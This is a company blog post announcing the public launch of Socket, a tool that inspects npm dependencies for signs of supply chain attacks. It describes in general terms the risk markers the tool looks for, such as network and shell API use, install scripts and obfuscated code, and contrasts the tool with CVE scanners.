Big update!Introducing GitHub Bot Commands. Learn more
Socket
Log inBook a demo

Introducing Socket

Socket's mission is to make open source safer.

Introducing Socket
Feross Aboukhadijeh

March 1, 2022


Today we're publicly launching Socket, a platform that protects your most critical apps from software supply chain attacks.

We've been in closed beta for the past seven months, but as of today, Socket is open for anyone to install and try out.

Why existing approaches to supply chain security fall short

Over the past decade, it's become clear that open source software has won. Sharing code freely has made it drastically cheaper and faster to build software – and tech innovation has accelerated as a result. But security has often been an afterthought. New technology spreads because it's useful, not because it's safe.

We are a team of open source maintainers with over 1 billion monthly downloads to our names. Working on the frontlines of open source, we've witnessed firsthand how supply chain attacks have swept across our communities and damaged trust in open source.

In 2021, we saw an unprecedented growth in the scale of open source supply chain attacks. Criminals are exploiting the trust in open source software to carry out brazen attacks that spread destructive malware. From event-stream to ua-parser-js, the attacks keep on coming and they seem to be accelerating.

Meanwhile, the entire security industry is obsessed with identifying known vulnerabilities. There are hundreds of variations of CVE scanners. They all miss the point. Looking for known vulnerabilities is reactive. Vulnerabilities take weeks or months to be discovered. In today's culture of fast development, a malicious dependency can be updated, merged, and running in production in days or even hours.

Socket turns the problem on its head and asks: what if we assume all open source may be malicious? Can we proactively detect indicators of compromised packages? What's the simplest way to mitigate this risk without hurting usability?

What does Socket do?

We are taking an entirely new approach to one of the hardest problems in security in a stagnant part of the industry that has historically been obsessed with just reporting on known vulnerabilities.

Unlike other tools, Socket detects and blocks supply chain attacks before they strike, mitigating the worst consequences. Socket uses deep package inspection to peel back the layers of a dependency to characterize its actual behavior.

[TODO: Insert webpack visualization]

Socket offers these best-in-class features:

  1. Supply Chain Attack Prevention: Prevent compromised or hijacked packages from infiltrating your supply chain by monitoring changes to package.json in real-time.
  2. Detect Suspicious Package Behavior: Detect when dependency updates introduce new usage of risky APIs such as network, shell, filesystem, and more.
  3. Comprehensive Protection: Block 60+ red flags in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Socket looks for indicators present in all of the recent npm supply chain attacks. And we're proactively auditing every package on npm to find these supply chain attacks.

How is Socket different from other code scanning tools?

The market is flooded with vulnerability scanners (which find CVEs in your dependencies) and static analysis tools (which analyze your app code).

These approaches are almost entirely useless at detecting the types of supply chain attacks we've seen exploding in the open source ecosystem.

  • Vulnerability scanners like Snyk or Dependabot merely look up the packages you're using to see if any vulnerabilities have been reported to public CVE databases such as NVD. This is too slow and reactive to stop an active supply chain attack.
  • Traditional static analysis tools are helpful for finding bugs in your app, but they're too noisy to use on thousands of lines of third-party code, and they don't produce actionable results when you're not familiar with the code in question. This isn't the solution to supply chain attacks, either.

Socket, on the other hand, was specifically designed to detect supply chain attacks in your dependencies.

Unlike a traditional security scanner, Socket can actually detect an active supply chain attack and help you to block it. Unlike a traditional static analysis tool, Socket provides actionable feedback about dependency risk instead of hundreds of meaningless alerts.

How does Socket work?

Socket uses "deep package inspection" to characterize the behavior of an open source package. By actually analyzing the package code, Socket can detect when packages use security-relevant platform capabilities, such as the network, filesystem, or shell.

For instance, to detect if a package uses the network, Socket looks at whether fetch(), or Node's net, dgram, dns, http or https modules are used within the package or any of its dependencies.

This entails running static analysis (and soon, dynamic analysis) on a package – and all of its dependencies – to look for specific risk markers.

In this way, Socket can detect the tell-tale signs of a supply chain attack, including the introduction of install scripts, obfuscated code, high entropy strings, or usage of privileged APIs such as shell, filesystem, eval(), and environment variables.

Who built Socket?

Every member of the Socket team is an open source maintainer. That's why we care so much about this problem.

Most security software is typically sold to executives, so it tends to suck to actually use it. In the best case, it gets purchased and sits around on a shelf bothering – and protecting – no one. In the worst case, it prevents developers from getting things done.

At developers ourselves, we understand there is an inherent tension between usability and security, but we refuse to compromise one for other. We're driven to protect the open source ecosystem with usable security.

Ultimately, that's the only way to make open source safe for everyone.

Try it out today

Today, our early customers are using Socket to protect their apps from typo-sqatting attacks, with more features coming later in March. If you're interested in trying out Socket, you can install the GitHub App in less than 5 minutes. Feel free to reach out to us as well if you'd like to chat and get a more in-depth demo.

We have a lot of exciting product releases planned for the coming year – if you'd like to stay in the loop, you can subscribe to updates below.

P.S. We're hiring at Socket! Check out our jobs page if you're interested in working to secure the software supply chain.


Back to all posts
Socket

Product

Subscribe to our newsletter

Get open source security insights delivered straight into your inbox. Be the first to learn about new features and product updates.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc